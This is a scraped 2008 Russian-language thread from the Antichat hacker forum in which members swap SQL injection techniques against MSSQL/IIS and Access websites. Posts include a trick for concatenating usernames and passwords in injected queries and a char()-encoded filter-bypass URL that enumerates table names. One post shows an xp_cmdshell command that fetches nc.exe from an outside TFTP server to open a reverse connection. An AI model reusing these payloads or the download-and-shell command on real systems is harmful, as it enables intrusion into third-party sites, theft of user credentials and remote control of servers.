19.02.2008, 22:10
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
С нами:
10158086
Репутация:
1359
|
|
способ не использовать cast или convert
вместо
Код:
cast(user as nvarchar)+':'+cast(pass as nvarchar)
можно
Код:
quotename(user+':'+pass)
|
|
|
19.02.2008, 22:16
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
%2B - это и есть +
но смысл не в этом, обычно если запрос передается через get + интерпритируется как пробел и при таком:id=1+1 в _GET['id'] зпишится а тут похоже идет через _SERVER['QUERY_STRING'] а потом парсится, при таком раскладе url коды нельзя использовать т.к. они не будут декодироваться а идти в sql запрос так как есть, так что тут как мне кажется вариант только использовать пробелы
__________________
Карфаген должен быть разрушен...
|
|
|
|
19.02.2008, 22:22
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
С нами:
10261766
Репутация:
1079
|
|
Сообщение от Scipio
при таком раскладе url коды нельзя использовать т.к. они не будут декодироваться а идти в sql запрос так как есть, так что тут как мне кажется вариант только использовать пробелы
Пробелы не получится использовать не урлэнкодя их, ибо тогда сам http запрос не получится, т.к. возникнет ошибка в его синтаксисе и сервер не воспримет его верно.
|
|
|
|
19.02.2008, 22:34
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
да, я как то не подумал об этом
хм, в таком случае получается что ничего не сделаешь...
__________________
Карфаген должен быть разрушен...
|
|
|
|
19.02.2008, 22:55
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
С нами:
10459106
Репутация:
2996
|
|
хз почему ну иногда + не пашет а %2B отлично работает, не забывайте то мы говорим как правило, про IIS а не apache.
|
|
|
|
02.03.2008, 22:27
|
|
Time out
Регистрация: 28.11.2005
Сообщений: 547
С нами:
10762826
Репутация:
1348
|
|
Не забываем, что можно для сеанса обратной связи юзать telnet с указанием порта. Если же доступа к telnet нет, можно исользовать вот такую интересную процедуру:
exec master.dbo.xp_cmdshell 'tftp -i 76.34.63.23 GET nc.exe'
Таким образом, соответственно, можно закачивать нужные файлы с tftp сервера.
P. S. TFTP не поддерживает аутентификацию.
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.
Последний раз редактировалось 1ten0.0net1; 02.03.2008 в 22:36..
|
|
|
|
03.03.2008, 02:09
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от 1ten0.0net1
Не забываем, что можно для сеанса обратной связи юзать telnet с указанием порта. Если же доступа к telnet нет, можно исользовать вот такую интересную процедуру:
exec master.dbo.xp_cmdshell 'tftp -i 76.34.63.23 GET nc.exe'
Таким образом, соответственно, можно закачивать нужные файлы с tftp сервера.
P. S. TFTP не поддерживает аутентификацию.
да можно, 1ten0.0net1, вобще много что можно
добиться даже без использования системных процедур
Дайте мне точку опоры - и я переверну Землю (Архимед)
главное были бы соответствующие права, а их к большому сожелению, часто не хватает, вот и приходится крутиться, а начет фтп серверов и иже с ними недолго сделать , что бы средствами комманд скачать из сети что нибудь и записать это куда надо, повторюсь, для этого нужны соответствующие права
__________________
Карфаген должен быть разрушен...
|
|
|
|
10.04.2008, 00:23
|
|
Постоянный
Регистрация: 20.12.2007
Сообщений: 334
С нами:
9680718
Репутация:
118
|
|
Обход фильтрации, работает только на первой таблице, а на второй выводит следующию ошибку:
ADODB.Command error '800a0d5d'
Application uses a value of the wrong type for the current operation.
/includes/logonManager.asp, line 370
Код:
http://site.com/conference.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(char(108)%2Bchar(105)%2Bchar(110)%2Bchar(107)%2Bchar(95)%2Bchar(99)%2Bchar(97)%2Bchar(116)%2Bchar(101)%2Bchar(103)%2Bchar(111)%2Bchar(114)%2Bchar(105)%2Bchar(101)%2Bchar(115),char(97)%2Bchar(100)%2Bchar(109)%2Bchar(105)%2Bchar(110)%2Bchar(117)%2Bchar(115)%2Bchar(101)%2Bchar(114)%2Bchar(95)%2Bchar(104)%2Bchar(105)%2Bchar(115)%2Bchar(116)%2Bchar(111)%2Bchar(114)%2Bchar(121))--
|
|
|
|
25.04.2008, 09:44
|
|
Познающий
Регистрация: 19.04.2008
Сообщений: 67
С нами:
9505375
Репутация:
19
|
|
Подскажите,что значит ошибка [Microsoft][ODBC Microsoft Access Driver] Syntax error in FROM clause при вот такой вот инъекции:
http://site.com/search/item.asp?itemid=1+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+e-mail
Гугль сказал что ошибка бывает при за росах FROM в таблицу,которая зарезервирована MS Access.Например Date и тд.Кроме e-mail никакой другой таблицы не нашел пока.@@version, (select db_name())-- , (select system_user)-- тоже не работает,ругается на syntax.Заранее спасибо.
Последний раз редактировалось DeepXhadow; 25.04.2008 в 09:57..
|
|
|
|
25.04.2008, 10:19
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
вот здесь читай:
http://forum.antichat.ru/thread50550.html
__________________
Карфаген должен быть разрушен...
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для shellz[21h]](/avatars/avatar46780.jpg?649540){kind=avatar}
Похожие темы
Линейный вид
